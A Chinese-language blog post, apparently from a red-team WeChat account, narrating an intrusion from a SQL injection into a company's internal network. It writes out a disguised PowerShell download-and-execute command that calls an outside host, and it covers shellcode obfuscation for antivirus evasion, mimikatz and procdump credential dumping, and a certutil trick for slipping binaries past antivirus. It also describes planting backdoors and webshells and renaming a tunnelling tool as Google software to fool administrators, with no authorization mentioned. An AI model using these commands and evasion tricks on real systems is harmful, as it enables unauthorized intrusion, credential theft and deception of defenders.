給我一個(gè)SQL注入我能干翻你內(nèi)網(wǎng)

滲透攻擊紅隊(duì)

一個(gè)專注于紅隊(duì)攻擊的公眾號(hào)

大家好，這里是?滲透攻擊紅隊(duì)?的第 48 篇文章，本公眾號(hào)會(huì)記錄一些紅隊(duì)攻擊的筆記（由淺到深），不定時(shí)更新

前言

首先拿到一個(gè)站，權(quán)限很小，而且各種上線失敗：

發(fā)現(xiàn)目標(biāo)服務(wù)器是 2008 r2：

最后使用 powershell 上線，參考的是s1ye師傅的文章：https://www.chabug.org/web/1324.html

powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://xxxxx:9000/1.ps1')

上線后權(quán)限有問(wèn)題，不能執(zhí)行 shell 。?

估計(jì)是對(duì)面機(jī)器上有殺軟，被攔截了。

在這里我犯了一個(gè)大忌，直接無(wú)腦丟 exe 到目標(biāo)機(jī)器上去執(zhí)行，而不是先 tasklist 查看進(jìn)程看看有沒(méi)有 AV ，再去做免殺，大家在實(shí)際的過(guò)程中一定要注意，寧愿穩(wěn)、慢、也不要粗暴！

由于我們是通過(guò)Sql注入拿到的shell，這個(gè)時(shí)候我們發(fā)現(xiàn)目標(biāo)可以開(kāi)啟xp_cmdshell 執(zhí)行os-shell：

發(fā)現(xiàn)是管理員權(quán)限，這個(gè)時(shí)候通過(guò) powershell 遠(yuǎn)程下載并執(zhí)行 exe 上線 CS ,發(fā)現(xiàn)被攔截了：

隨后使用 bypass 后的 powershell 腳本進(jìn)行配合 sqlmap 執(zhí)行命令成功上線：

拿到權(quán)限之后發(fā)現(xiàn)是一個(gè)工作組環(huán)境：

為了接下來(lái)的內(nèi)網(wǎng)滲透，我們進(jìn)行吧權(quán)限遷移到CS或者M(jìn)SF上，我這邊使用CS-Http上線：

之后用cs生成一個(gè)ps1，然后進(jìn)行免殺：

https://www.cnblogs.com/forforever/p/13882312.html

$string = ''$s?=?[Byte[]]$var_code?=?[System.Convert]::FromBase64String('這里是編碼的 shellcode')$s |foreach { $string = $string + $_.ToString()+','}$string > c:\1.txt

本地測(cè)試一下：

powershell -ExecutionPolicy bypass -File .\index.ps1

可以上線！Virustotal 發(fā)現(xiàn) bypass 了大部分 AV：

之后就上傳到目標(biāo)服務(wù)器成功上線CS：

雖然上線CS了，但是執(zhí)行命令不了，可能是被攔截了：

這個(gè)時(shí)候我們嘗試用 https 上線：

重復(fù)上面的操作：

隨后運(yùn)行 powershell 上線：

這個(gè)時(shí)候就能執(zhí)行命令了：

隨后 Run mimikatz 抓到了管理員的明文和哈希：

先不登錄他遠(yuǎn)程桌面，我們先掃描內(nèi)網(wǎng)存活主機(jī)，進(jìn)行橫向滲透：

發(fā)現(xiàn)存在大量機(jī)器：

之后進(jìn)行 psexec 橫向但是都沒(méi)上線成功，我先做個(gè)流量socks代理：

之后發(fā)現(xiàn)他內(nèi)網(wǎng)基本上都開(kāi)放了 80 端口：

之后通過(guò)一個(gè)一個(gè)搞，中途拿下了幾臺(tái)機(jī)子后好像被發(fā)現(xiàn)了，這個(gè)時(shí)候發(fā)現(xiàn)sqlmap也沒(méi)用了，它直接關(guān)站了！

過(guò)了幾天，由于我之前留了一個(gè) IIS 后門(mén)：

為了方便，我寫(xiě)了一個(gè)冰蝎馬到網(wǎng)站目錄

之后翻配置文件翻到了數(shù)據(jù)庫(kù)密碼：

還是那句話，除了在目標(biāo)機(jī)器上抓系統(tǒng)賬號(hào)密碼，一定要去多翻翻機(jī)器上的其他文件：郵件、截截屏、翻翻瀏覽器記錄、收藏夾、注冊(cè)表、各類(lèi)客戶端軟件目錄下的配置文件...

這些文件里面很有可能包含大量有價(jià)值的賬號(hào)密碼，總之就一句話：拿到機(jī)器之后，先別急著上去就開(kāi)始瞎掃，先把當(dāng)前機(jī)器能翻的翻個(gè)底朝天，一直翻到不能動(dòng)為止！千萬(wàn)別動(dòng)不動(dòng)上去不管三七二十一對(duì)著內(nèi)網(wǎng)就說(shuō)一段胡瞎掃，萬(wàn)一遇到什么流量檢測(cè)設(shè)備苛刻點(diǎn)的環(huán)境，或者管理規(guī)范經(jīng)驗(yàn)豐富的網(wǎng)管，可能很快就把你踢出局了，滲透過(guò)程中被對(duì)方發(fā)現(xiàn)是一件非常丟人的事情，實(shí)在是有點(diǎn)得不償失，進(jìn)入目標(biāo)內(nèi)網(wǎng)后，仔細(xì)耐心搜集信息永遠(yuǎn)是第一位的，寧愿慢、穩(wěn)、也不要粗暴！

之后使用 procdump.exe 抓 lsass.dump 讀取密碼：

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

這里有個(gè)坑，我使用 procdump.exe 讀取 lsass.dmp 是保存為 2.txt，不知道為什么，目標(biāo)服務(wù)器上只要有? lsass.dmp 就會(huì)被殺掉，所以我吧它修改為 txt 然后就不會(huì)被殺了，之后下載到本地吧它修改為 lsass.dmp 就沒(méi)事了！

由于冰蝎的 socks 代理是基于 http 的，不穩(wěn)定，那么我就用 frp 進(jìn)行代理，再代理前，我把 客戶端的 frp 圖標(biāo)修改為 google 的圖標(biāo)用于麻痹管理員：

然后上傳到目標(biāo)服務(wù)器上：

在這里有一個(gè)小技巧，如果對(duì)面有殺軟你上傳exe就會(huì)被殺，那么你可以使用編碼，把 frpc.exe 編碼為 txt：

CertUtil -encode frpc.exe frpc.txt

然后再使用 certUtil 下載 frpc.txt ：

certutil.exe -urlcache -split -f frpc.txt的地址

之后再目標(biāo)服務(wù)器解碼就可以了：

CertUtil -decode frpc.txt frpc.exe

然后進(jìn)行 frp 內(nèi)網(wǎng)穿透：

GoogleUpdate.exe -c GoogleUpdate.ini

在然后就可以了：

然后直接上線 CS ：

日到這里發(fā)現(xiàn) 10.0.0.0 這個(gè)網(wǎng)段只有一臺(tái)主機(jī)存活：

那么就很尷尬了，我的目標(biāo)是拿下目標(biāo)核心域控，只能重新打點(diǎn)搞了！

這個(gè)時(shí)候就只能重新搞了！

我后面又找到了一些注入點(diǎn)：

但是執(zhí)行不了命令，估計(jì)是寫(xiě)權(quán)限被寫(xiě)死了：

沒(méi)辦法，只能通過(guò) SQLMAP 來(lái)進(jìn)行信息搜集了，sqlmap --password 跑出一些密碼：

執(zhí)行 -- sql-shell 可以讀取 passwd 文件：

通過(guò)讀文件，順?biāo)浦壅业搅藬?shù)據(jù)庫(kù)的配置文件：

之后通過(guò)sqlmap跑出來(lái)后臺(tái)賬號(hào)密碼：

后臺(tái)沒(méi)做限制上傳 php 成功 getshell：

然后通過(guò)查看網(wǎng)站源代碼找到 php 路徑：

但是蟻劍鏈接發(fā)現(xiàn)有問(wèn)題：

這個(gè)時(shí)候用蟻劍的馬上傳：

成功 getshell ！進(jìn)入內(nèi)網(wǎng)后發(fā)現(xiàn)沒(méi)內(nèi)網(wǎng)，而且沒(méi)有翻到可利用的東西！哎，那么又得重新打點(diǎn)了！

然后我又找到了幾處注入點(diǎn)：

同樣不能執(zhí)行命令：

后面找到后臺(tái)賬號(hào)密碼登錄到后臺(tái)發(fā)現(xiàn)沒(méi)有什么上傳點(diǎn)：

最后日進(jìn)了一個(gè)聊天室，但是沒(méi)啥用：

其實(shí)本篇的技術(shù)不多，都是圍繞 SQL 注入來(lái)寫(xiě)的，可見(jiàn)一個(gè) SQL 注入就可以幫我們完成這么多的事情，一個(gè) SQL 注入就能干翻內(nèi)網(wǎng)，還是那句話，滲透的本質(zhì)就是信息搜集，信息搜集的足夠多，你滲透的成功性就會(huì)越大！

點(diǎn)分享

點(diǎn)點(diǎn)贊

點(diǎn)在看